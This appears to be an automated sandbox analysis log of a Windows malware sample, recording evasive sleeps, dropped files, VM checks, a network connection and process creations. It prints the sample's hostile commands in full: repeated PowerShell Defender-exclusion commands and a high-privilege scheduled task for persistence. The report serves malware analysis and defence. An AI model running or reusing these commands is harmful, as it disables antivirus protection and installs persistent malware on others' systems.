                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UZVKerGo.log
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WkrLeKmp.log
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yfmgiIMl.log
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pfMyjKNB.log
                          Source: C:\Recovery\dllhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CcvWVetw.log
                          Source: C:\Recovery\dllhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lVerBrOi.log
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe TID: 7068 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 1516 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7132 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596 Thread sleep count: 3754 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep count: 3776 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 Thread sleep count: 3619 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep count: 3421 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644 Thread sleep count: 3159 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep count: 3290 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936 Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe TID: 3052 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe TID: 7736 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe TID: 8020 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe TID: 4428 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe TID: 7556 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe TID: 7836 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7320 Thread sleep time: -30000s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -34126476536362649s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -600000s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -599881s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -599734s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -599623s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -599514s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -599390s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -599274s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -599169s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -599062s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7492 Thread sleep time: -3600000s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -598951s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -598843s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7492 Thread sleep time: -300000s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -598718s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -598563s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -598359s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -598214s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -598085s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -597930s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -597734s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -597590s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -597464s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468 Thread sleep time: -597358s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -597246s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -597130s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596984s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596836s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596718s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596609s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596496s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596375s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596265s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596040s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595794s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595680s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595578s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595465s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595359s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595250s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595140s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595010s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594906s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594797s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594682s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594578s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594468s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594359s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594250s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594140s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594017s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593901s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593500s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593350s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593232s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593117s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592999s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592886s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592757s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592621s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592500s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592390s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592280s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 6324Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe TID: 2128Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe TID: 2212Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe TID: 340Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 6260Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\dllhost.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\dllhost.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\dllhost.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\dllhost.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\dllhost.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 30000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 600000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599881
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599734
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599623
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599514
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599390
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599274
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599169
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599062
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 3600000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598951
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598843
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 300000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598718
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598563
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598359
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598214
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598085
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597930
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597734
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597590
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597464
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597358
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597246
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597130
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596984
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596836
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596718
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596609
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596496
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596375
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596265
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596040
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595794
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595680
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595578
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595465
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595359
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595250
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595140
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595010
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594906
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594797
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594682
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594578
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594468
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594359
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594250
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594140
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594017
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593901
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593500
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593350
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593232
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593117
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592999
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592886
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592757
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592621
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592500
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592390
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592280
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File opened: C:\Users\user
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File opened: C:\Users\user\AppData
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File opened: C:\Users\user\AppData\Local
                          Source: UuIspZT5b6.exe, 00000000.00000002.1885155255.000000001C505000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA*J
                          Source: w32tm.exe, 0000002D.00000002.1873608640.000002C6F9447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process token adjusted: Debug
                          Source: C:\Recovery\dllhost.exe Process token adjusted: Debug
                          Source: C:\Recovery\dllhost.exe Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Process token adjusted: Debug
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Process token adjusted: Debug
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Process token adjusted: Debug
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process token adjusted: Debug
                          Source: C:\Recovery\dllhost.exe Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Recovery\dllhost.exe Network Connect: 172.67.203.2 80
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4F01.tmp" "c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP"
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\dllhost.exe "C:\Recovery\dllhost.exe"
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Queries volume information: C:\Users\user\Desktop\UuIspZT5b6.exe VolumeInformation
                          Source: C:\Recovery\dllhost.exe Queries volume information: C:\Recovery\dllhost.exe VolumeInformation
                          Source: C:\Recovery\dllhost.exe Queries volume information: C:\Recovery\dllhost.exe VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
